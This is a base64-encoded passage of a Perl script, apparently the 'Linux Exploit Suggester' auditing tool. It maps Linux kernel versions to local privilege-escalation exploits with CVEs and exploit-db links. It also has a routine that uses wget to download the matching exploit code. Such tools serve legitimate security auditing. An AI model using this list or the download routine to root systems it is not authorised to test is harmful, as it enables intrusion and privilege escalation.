KSkgewogICAgICAgIHByaW50ICIgIFxlWzAwOzMxbVNwZWNpZmllZCBrZXJuZWwgaXMgaW4gdGhlIHdyb25nIGZvcm1hdFxlWzAwbVxuIjsKICAgICAgICBwcmludCAiICBUcnkgYSBrZXJuZWwgZm9ybWF0IGxpa2UgdGhpczogMy4yLjBcblxuIjsKICAgICAgICBleGl0OwogICAgfQoKICAgICMgcGFydGlhbCBrZXJuZWxzIG1pZ2h0IGJlIHByb3ZpZGVkIGJ5IHRoZSB1c2VyLAogICAgIyBzdWNoIGFzICcyLjQnIG9yICcyLjYuJwogICAgbXkgJGlzX3BhcnRpYWwgPSAka2hvc3QgPX4gL15cZCtcLlxkK1wuXGQ/LyA/IDAgOiAxOwogICAgcmV0dXJuICggJGtob3N0LCAkaXNfcGFydGlhbCApOwp9CgpzdWIgZG93bmxvYWRfZXhwbG9pdHMgewogICAgbXkgKCRzcmVmLCAkYXJlZikgPSBAXzsKICAgIG15IEBzZWxlY3RlZCA9IEB7ICRzcmVmIH07CiAgICBteSBAYXBwbGljYWJsZSA9IEB7ICRhcmVmIH07CiAgICBteSAkZXhwbG9pdF9iYXNlID0gInd3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cyI7CiAgICBteSAkZG93bmxvYWRfYmFzZSA9ICJodHRwczovL3d3dy5leHBsb2l0LWRiLmNvbS9yYXcvIjsKICAgIHByaW50ICJcbiI7CgogICAgZm9yZWFjaCBteSAkbnVtIChAc2VsZWN0ZWQpIHsKICAgICAgICBteSAkbWlsID0gJGFwcGxpY2FibGVbJG51bS0xXXttaWx9OwogICAgICAgIG5leHQgaWYgKCFkZWZpbmVkICRtaWwpOwogICAgICAgIG15ICgkZXhwbG9pdF9udW0pID0gKCRtaWwgPX4gL14uKlwvKFsxLTldWzAtOV0qKVwvPyQvKTsKICAgICAgICAKICAgICAgICBpZiAoJGV4cGxvaXRfbnVtICYmIGluZGV4KCRtaWwsICRleHBsb2l0X2Jhc2UpICE9IC0xKSB7CiAgICAgICAgICAgIG15ICR1cmwgPSAkZG93bmxvYWRfYmFzZSAuICRleHBsb2l0X251bTsKICAgICAgICAgICAgbXkgJGZpbGUgPSAiZXhwbG9pdF8kYXBwbGljYWJsZVskbnVtLTFde2tleX0iOwogICAgICAgICAgICBwcmludCAiICBEb3dubG9hZGluZyBcZVswMDszM20kdXJsXGVbMDBtIC0+IFxlWzAwOzMzbSRmaWxlXGVbMDBtXG4iOwogICAgICAgICAgICBzeXN0ZW0gIndnZXQgJHVybCAtTyAkZmlsZSA+IC9kZXYvbnVsbCAyPiYxIjsKICAgICAgICB9CiAgICAgICAgZWxzZSB7CiAgICAgICAgICAgIHByaW50ICIgIE5vIGV4cGxvaXQgY29kZSBhdmFpbGFibGUgZm9yIFxlWzAwOzMzbSRhcHBsaWNhYmxlWyRudW0tMV17a2V5fVxlWzAwbVxuIjsgCiAgICAgICAgfQogICAgfQogICAgcHJpbnQgIlxuIjsKfQoKc3ViIHVuaXEgewogICAgbXkgJXNlZW47CiAgICBncmVwICEkc2VlbnskX30rKywgQF87Cn0KCnN1YiB1c2FnZSB7CnByaW50X2Jhbm5lcigpOwpwcmludCAiICBcZVswMDszNW1Vc2FnZTpcZVswMG0gJDAgWy1oXSBbLWsga2VybmVsXSBbLWRdXG5cbiI7CnByaW50ICIgIFxlWzAwOzMzbVtcZVswMG1cZVswMDszMW0taFxlWzAwbVxlWzAwOzMzbV1cZVswMG0gSGVscCAodGhpcyBtZXNzYWdlKVxuIjsKcHJpbnQgIiAgXGVbMDA7MzNtW1xlWzAwbVxlWzAwOzMxbS1rXGVbMDBtXGVbMDA7MzNtXVxlWzAwbSBLZXJuZWwgbnVtYmVyIChlZy4gMi42LjI4KVxuIjsKcHJpbnQgIiAgXGVbMDA7MzNtW1xlWzAwbVxlWzAwOzMxbS1kXGVbMDBtXGVbMDA7MzNtXVxlWzAwbSBPcGVuIGV4cGxvaXQgZG93bmxvYWQgbWVudVxuXG4iOwoKcHJpbnQgIiAgWW91IGNhbiBhbHNvIHByb3ZpZGUgYSBwYXJ0aWFsIGtlcm5lbCB2ZXJzaW9uIChlZy4gMi40KVxuIjsKcHJpbnQgIiAgdG8gc2VlIGFsbCBleHBsb2l0cyBhdmFpbGFibGUuXG5cbiI7Cn0KCnN1YiBwcmludF9iYW5uZXIgewpwcmludCAiXG5cZVswMDszM20gICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXGVbMDBtXG4iOwpwcmludCAiXGVbMTszMW0gICAgTGludXggRXhwbG9pdCBTdWdnZXN0ZXIgJFZFUlNJT05cZVswMG1cbiI7CnByaW50ICJcZVswMDszM20gICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXGVbMDBtXG5cbiI7Cn0KCnN1YiBnZXRfZXhwbG9pdHMgewogIHJldHVybiAoCiAgICAndzAwdCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi40LjEwJywgJzIuNC4xNicsICcyLjQuMTcnLCAnMi40LjE4JywKICAgICAgICAgICAgJzIuNC4xOScsICcyLjQuMjAnLCAnMi40LjIxJywKICAgICAgICBdCiAgICB9LAogICAgJ2JyaycgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi40LjEwJywgJzIuNC4xOCcsICcyLjQuMTknLCAnMi40LjIwJywgJzIuNC4yMScsICcyLjQuMjInIF0sCiAgICB9LAogICAgJ2F2ZScgPT4geyB2dWxuID0+IFsgJzIuNC4xOScsICcyLjQuMjAnIF0gfSwKCiAgICAnZWxmbGJsJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbJzIuNC4yOSddLAogICAgICAgIG1pbCAgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNzQ0JywKICAgIH0sCgogICAgJ2VsZmR1bXAnICAgICAgPT4geyB2dWxuID0+IFsnMi40LjI3J10gfSwKICAgICdlbGZjZCcgICAgICAgID0+IHsgdnVsbiA9PiBbJzIuNi4xMiddIH0sCiAgICAnZXhwYW5kX3N0YWNrJyA9PiB7IHZ1bG4gPT4gWycyLjQuMjknXSB9LAoKICAgICdoMDBseXNoaXQnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi44JywgICcyLjYuMTAnLCAnMi42LjExJywgJzIuNi4xMicsCiAgICAgICAgICAgICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLAogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDA2LTM2MjYnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDEzJywKICAgIH0sCgogICAgJ2tkdW1wJyA9PiB7IHZ1bG4gPT4gWycyLjYuMTMnXSB9LAogICAgJ2ttMicgICA9PiB7IHZ1bG4gPT4gWyAnMi40LjE4JywgJzIuNC4yMicgXSB9LAogICAgJ2tyYWQnID0+CiAgICAgIHsgdnVsbiA9PiBbICcyLjYuNScsICcyLjYuNycsICcyLjYuOCcsICcyLjYuOScsICcyLjYuMTAnLCAnMi42LjExJyBdIH0sCgogICAgJ2tyYWQzJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuNScsICcyLjYuNycsICcyLjYuOCcsICcyLjYuOScsICcyLjYuMTAnLCAnMi42LjExJyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL2V4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzEzOTcnLAogICAgfSwKCiAgICAnbG9jYWwyNicgPT4geyB2dWxuID0+IFsnMi42LjEzJ10gfSwKICAgICdsb2tvJyAgICA9PiB7IHZ1bG4gPT4gWyAnMi40LjIyJywgJzIuNC4yMycsICcyLjQuMjQnIF0gfSwKCiAgICAnbXJlbWFwX3B0ZScgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi40LjIwJywgJzIuMi4yNCcsICcyLjQuMjUnLCAnMi40LjI2JywgJzIuNC4yNycgXSwKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTYwJywKICAgIH0sCgogICAgJ25ld2xvY2FsJyA9PiB7IHZ1bG4gPT4gWyAnMi40LjE3JywgJzIuNC4xOScgXSB9LAogICAgJ29uZ19iYWsnICA9PiB7IHZ1bG4gPT4gWycyLjYuNSddIH0sCiAgICAncHRyYWNlJyA9PgogICAgICB7IHZ1bG4gPT4gWyAnMi40LjE4JywgJzIuNC4xOScsICcyLjQuMjAnLCAnMi40LjIxJywgJzIuNC4yMicgXSB9LAogICAgJ3B0cmFjZV9rbW9kJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjQuMTgnLCAnMi40LjE5JywgJzIuNC4yMCcsICcyLjQuMjEnLCAnMi40LjIyJyBdLAogICAgICAgIGN2ZSAgPT4gJzIwMDctNDU3MycsCiAgICB9LAogICAgJ3B0cmFjZV9rbW9kMicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywgJzIuNi4zMCcsICcyLjYuMzEnLAogICAgICAgICAgICAnMi42LjMyJywgJzIuNi4zMycsICcyLjYuMzQnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICdpYTMyc3lzY2FsbCxyb2JlcnRfeW91X3N1Y2snLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNTAyMycsCiAgICAgICAgY3ZlID0+ICcyMDEwLTMzMDEnLAogICAgfSwKICAgICdwdHJhY2UyNCcgPT4geyB2dWxuID0+IFsnMi40LjknXSB9LAogICAgJ3B3bmVkJyAgICA9PiB7IHZ1bG4gPT4gWycyLjYuMTEnXSB9LAogICAgJ3B5MicgICAgICA9PiB7IHZ1bG4gPT4gWyAnMi42LjknLCAnMi42LjE3JywgJzIuNi4xNScsICcyLjYuMTMnIF0gfSwKICAgICdyYXB0b3JfcHJjdGwnID0+IHsKICAgICAgICB2dWxuID0+IFsgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnIF0sCiAgICAgICAgY3ZlICA9PiAnMjAwNi0yNDUxJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMjAzMScsCiAgICB9LAogICAgJ3ByY3RsJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDA0JywKICAgIH0sCiAgICAncHJjdGwyJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDA1JywKICAgIH0sCiAgICAncHJjdGwzJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDA2JywKICAgIH0sCiAgICAncHJjdGw0JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDExJywKICAgIH0sCiAgICAncmVtYXAnICAgICAgPT4geyB2dWxuID0+IFsnMi40J10gfSwKICAgICdyaXAnICAgICAgICA9PiB7IHZ1bG4gPT4gWycyLjInXSB9LAogICAgJ3N0YWNrZ3JvdzInID0+IHsgdnVsbiA9PiBbICcyLjQuMjknLCAnMi42LjEwJyBdIH0sCiAgICAndXNlbGliMjQnID0+IHsKICAgICAgICB2dWxuID0+IFsgJzIuNi4xMCcsICcyLjQuMTcnLCAnMi40LjIyJywgJzIuNC4yNScsICcyLjQuMjcnLCAnMi40LjI5JyBdCiAgICB9LAogICAgJ25ld3NtcCcgICA9PiB7IHZ1bG4gPT4gWycyLjYnXSB9LAogICAgJ3NtcHJhY2VyJyA9PiB7IHZ1bG4gPT4gWycyLjQuMjknXSB9LAogICAgJ2xvZ2lueCcgICA9PiB7IHZ1bG4gPT4gWycyLjQuMjInXSB9LAogICAgJ2V4cC5zaCcgICA9PiB7IHZ1bG4gPT4gWyAnMi42LjknLCAnMi42LjEwJywgJzIuNi4xNicsICcyLjYuMTMnIF0gfSwKICAgICd2bXNwbGljZTEnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4xNycsICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywKICAgICAgICAgICAgJzIuNi4yMycsICcyLjYuMjQnLCAnMi42LjI0LjEnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICdqZXNzaWNhIGJpZWwnLAogICAgICAgIGN2ZSA9PiAnMjAwOC0wNjAwJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNTA5MicsCiAgICB9LAogICAgJ3Ztc3BsaWNlMicgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi42LjIzJywgJzIuNi4yNCcgXSwKICAgICAgICBhbHQgID0+ICdkaWFuZV9sYW5lJywKICAgICAgICBjdmUgID0+ICcyMDA4LTA2MDAnLAogICAgICAgIG1pbCAgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNTA5MycsCiAgICB9LAogICAgJ3Zjb25zb2xlJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbJzIuNiddLAogICAgICAgIGN2ZSAgPT4gJzIwMDktMTA0NicsCiAgICB9LAogICAgJ3NjdHAnID0+IHsKICAgICAgICB2dWxuID0+IFsnMi42LjI2J10sCiAgICAgICAgY3ZlICA9PiAnMjAwOC00MTEzJywKICAgIH0sCiAgICAnZnRyZXgnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4xMScsICcyLjYuMTInLCAnMi42LjEzJywgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywKICAgICAgICAgICAgJzIuNi4xNycsICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAwOC00MjEwJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNjg1MScsCiAgICB9LAogICAgJ2V4aXRfbm90aWZ5JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy84MzY5JywKICAgIH0sCiAgICAndWRldicgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScgXSwKICAgICAgICBhbHQgID0+ICd1ZGV2IDwxLjQuMScsCiAgICAgICAgY3ZlICA9PiAnMjAwOS0xMTg1JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvODQ3OCcsCiAgICB9LAoKICAgICdzb2NrX3NlbmRwYWdlMicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi40LjQnLCAgJzIuNC41JywgICcyLjQuNicsICAnMi40LjcnLCAgJzIuNC44JywgICcyLjQuOScsCiAgICAgICAgICAgICcyLjQuMTAnLCAnMi40LjExJywgJzIuNC4xMicsICcyLjQuMTMnLCAnMi40LjE0JywgJzIuNC4xNScsCiAgICAgICAgICAgICcyLjQuMTYnLCAnMi40LjE3JywgJzIuNC4xOCcsICcyLjQuMTknLCAnMi40LjIwJywgJzIuNC4yMScsCiAgICAgICAgICAgICcyLjQuMjInLCAnMi40LjIzJywgJzIuNC4yNCcsICcyLjQuMjUnLCAnMi40LjI2JywgJzIuNC4yNycsCiAgICAgICAgICAgICcyLjQuMjgnLCAnMi40LjI5JywgJzIuNC4zMCcsICcyLjQuMzEnLCAnMi40LjMyJywgJzIuNC4zMycsCiAgICAgICAgICAgICcyLjQuMzQnLCAnMi40LjM1JywgJzIuNC4zNicsICcyLjQuMzcnLCAnMi42LjAnLCAgJzIuNi4xJywKICAgICAgICAgICAgJzIuNi4yJywgICcyLjYuMycsICAnMi42LjQnLCAgJzIuNi41JywgICcyLjYuNicsICAnMi42LjcnLAogICAgICAgICAgICAnMi42LjgnLCAgJzIuNi45JywgICcyLjYuMTAnLCAnMi42LjExJywgJzIuNi4xMicsICcyLjYuMTMnLAogICAgICAgICAgICAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JywgJzIuNi4xOCcsICcyLjYuMTknLAogICAgICAgICAgICAnMi42LjIwJywgJzIuNi4yMScsICcyLjYuMjInLCAnMi42LjIzJywgJzIuNi4yNCcsICcyLjYuMjUnLAogICAgICAgICAgICAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywgJzIuNi4zMCcsCiAgICAgICAgXSwKICAgICAgICBhbHQgPT4gJ3Byb3RvX29wcycsCiAgICAgICAgY3ZlID0+ICcyMDA5LTI2OTInLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy85NDM2JywKICAgIH0sCgogICAgJ3NvY2tfc2VuZHBhZ2UnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNC40JywgICcyLjQuNScsICAnMi40LjYnLCAgJzIuNC43JywgICcyLjQuOCcsICAnMi40LjknLAogICAgICAgICAgICAnMi40LjEwJywgJzIuNC4xMScsICcyLjQuMTInLCAnMi40LjEzJywgJzIuNC4xNCcsICcyLjQuMTUnLAogICAgICAgICAgICAnMi40LjE2JywgJzIuNC4xNycsICcyLjQuMTgnLCAnMi40LjE5JywgJzIuNC4yMCcsICcyLjQuMjEnLAogICAgICAgICAgICAnMi40LjIyJywgJzIuNC4yMycsICcyLjQuMjQnLCAnMi40LjI1JywgJzIuNC4yNicsICcyLjQuMjcnLAogICAgICAgICAgICAnMi40LjI4JywgJzIuNC4yOScsICcyLjQuMzAnLCAnMi40LjMxJywgJzIuNC4zMicsICcyLjQuMzMnLAogICAgICAgICAgICAnMi40LjM0JywgJzIuNC4zNScsICcyLjQuMzYnLCAnMi40LjM3JywgJzIuNi4wJywgICcyLjYuMScsCiAgICAgICAgICAgICcyLjYuMicsICAnMi42LjMnLCAgJzIuNi40JywgICcyLjYuNScsICAnMi42LjYnLCAgJzIuNi43JywKICAgICAgICAgICAgJzIuNi44JywgICcyLjYuOScsICAnMi42LjEwJywgJzIuNi4xMScsICcyLjYuMTInLCAnMi42LjEzJywKICAgICAgICAgICAgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywgJzIuNi4xNycsICcyLjYuMTgnLCAnMi42LjE5JywKICAgICAgICAgICAgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsICcyLjYuMjQnLCAnMi42LjI1JywKICAgICAgICAgICAgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsICcyLjYuMzAnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICd3dW5kZXJiYXJfZW1wb3JpdW0nLAogICAgICAgIGN2ZSA9PiAnMjAwOS0yNjkyJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvOTQzNScsCiAgICB9LAogICAgJ3VkcF9zZW5kbXNnXzMyYml0JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMScsICAnMi42LjInLCAgJzIuNi4zJywgICcyLjYuNCcsICAnMi42LjUnLCAgJzIuNi42JywKICAgICAgICAgICAgJzIuNi43JywgICcyLjYuOCcsICAnMi42LjknLCAgJzIuNi4xMCcsICcyLjYuMTEnLCAnMi42LjEyJywKICAgICAgICAgICAgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnLCAnMi42LjE4JywKICAgICAgICAgICAgJzIuNi4xOScsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMDktMjY5OCcsCiAgICAgICAgbWlsID0+CiAgICAgICAgICAnaHR0cDovL2Rvd25sb2Fkcy5zZWN1cml0eWZvY3VzLmNvbS92dWxuZXJhYmlsaXRpZXMvZXhwbG9pdHMvMzYxMDguYycsCiAgICB9LAogICAgJ3BpcGUuY18zMmJpdCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi40LjQnLCAgJzIuNC41JywgICcyLjQuNicsICAnMi40LjcnLCAgJzIuNC44JywgICcyLjQuOScsCiAgICAgICAgICAgICcyLjQuMTAnLCAnMi40LjExJywgJzIuNC4xMicsICcyLjQuMTMnLCAnMi40LjE0JywgJzIuNC4xNScsCiAgICAgICAgICAgICcyLjQuMTYnLCAnMi40LjE3JywgJzIuNC4xOCcsICcyLjQuMTknLCAnMi40LjIwJywgJzIuNC4yMScsCiAgICAgICAgICAgICcyLjQuMjInLCAnMi40LjIzJywgJzIuNC4yNCcsICcyLjQuMjUnLCAnMi40LjI2JywgJzIuNC4yNycsCiAgICAgICAgICAgICcyLjQuMjgnLCAnMi40LjI5JywgJzIuNC4zMCcsICcyLjQuMzEnLCAnMi40LjMyJywgJzIuNC4zMycsCiAgICAgICAgICAgICcyLjQuMzQnLCAnMi40LjM1JywgJzIuNC4zNicsICcyLjQuMzcnLCAnMi42LjE1JywgJzIuNi4xNicsCiAgICAgICAgICAgICcyLjYuMTcnLCAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsCiAgICAgICAgICAgICcyLjYuMjMnLCAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsCiAgICAgICAgICAgICcyLjYuMjknLCAnMi42LjMwJywgJzIuNi4zMScsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMDktMzU0NycsCiAgICAgICAgbWlsID0+CiAgICAgICAgICAnaHR0cDovL3d3dy5zZWN1cml0eWZvY3VzLmNvbS9kYXRhL3Z1bG5lcmFiaWxpdGllcy9leHBsb2l0cy8zNjkwMS0xLmMnLAogICAgfSwKICAgICdkb19wYWdlc19tb3ZlJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsCiAgICAgICAgICAgICcyLjYuMzAnLCAnMi42LjMxJywKICAgICAgICBdLAogICAgICAgIGFsdCA9PiAnc2lldmUnLAogICAgICAgIGN2ZSA9PiAnMjAxMC0wNDE1JywKICAgICAgICBtaWwgPT4gJ1NwZW5kZXJzIEVubGlnaHRlbm1lbnQnLAogICAgfSwKICAgICdyZWlzZXJmcycgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTAtMTE0NicsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzEyMTMwJywKICAgIH0sCiAgICAnY2FuX2JjbScgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLAogICAgICAgICAgICAnMi42LjM2JywKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAxMC0yOTU5JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTQ4MTQnLAogICAgfSwKICAgICdyZHMnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4zMCcsICcyLjYuMzEnLCAnMi42LjMyJywgJzIuNi4zMycsCiAgICAgICAgICAgICcyLjYuMzQnLCAnMi42LjM1JywgJzIuNi4zNicsCiAgICAgICAgXSwKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTUyODUnLAogICAgICAgIGN2ZSA9PiAnMjAxMC0zOTA0JywKICAgIH0sCiAgICAnaGFsZl9uZWxzb24xJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMCcsICAnMi42LjEnLCAgJzIuNi4yJywgICcyLjYuMycsICAnMi42LjQnLCAgJzIuNi41JywKICAgICAgICAgICAgJzIuNi42JywgICcyLjYuNycsICAnMi42LjgnLCAgJzIuNi45JywgICcyLjYuMTAnLCAnMi42LjExJywKICAgICAgICAgICAgJzIuNi4xMicsICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JywKICAgICAgICAgICAgJzIuNi4xOCcsICcyLjYuMTknLCAnMi42LjIwJywgJzIuNi4yMScsICcyLjYuMjInLCAnMi42LjIzJywKICAgICAgICAgICAgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywKICAgICAgICAgICAgJzIuNi4zMCcsICcyLjYuMzEnLCAnMi42LjMyJywgJzIuNi4zMycsICcyLjYuMzQnLCAnMi42LjM1JywKICAgICAgICAgICAgJzIuNi4zNicsCiAgICAgICAgXSwKICAgICAgICBhbHQgPT4gJ2Vjb25ldCcsCiAgICAgICAgY3ZlID0+ICcyMDEwLTM4NDgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNzc4NycsCiAgICB9LAogICAgJ2hhbGZfbmVsc29uMicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjAnLCAgJzIuNi4xJywgICcyLjYuMicsICAnMi42LjMnLCAgJzIuNi40JywgICcyLjYuNScsCiAgICAgICAgICAgICcyLjYuNicsICAnMi42LjcnLCAgJzIuNi44JywgICcyLjYuOScsICAnMi42LjEwJywgJzIuNi4xMScsCiAgICAgICAgICAgICcyLjYuMTInLCAnMi42LjEzJywgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywgJzIuNi4xNycsCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsCiAgICAgICAgICAgICcyLjYuMzAnLCAnMi42LjMxJywgJzIuNi4zMicsICcyLjYuMzMnLCAnMi42LjM0JywgJzIuNi4zNScsCiAgICAgICAgICAgICcyLjYuMzYnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICdlY29uZXQnLAogICAgICAgIGN2ZSA9PiAnMjAxMC0zODUwJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTc3ODcnLAogICAgfSwKICAgICdoYWxmX25lbHNvbjMnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4wJywgICcyLjYuMScsICAnMi42LjInLCAgJzIuNi4zJywgICcyLjYuNCcsICAnMi42LjUnLAogICAgICAgICAgICAnMi42LjYnLCAgJzIuNi43JywgICcyLjYuOC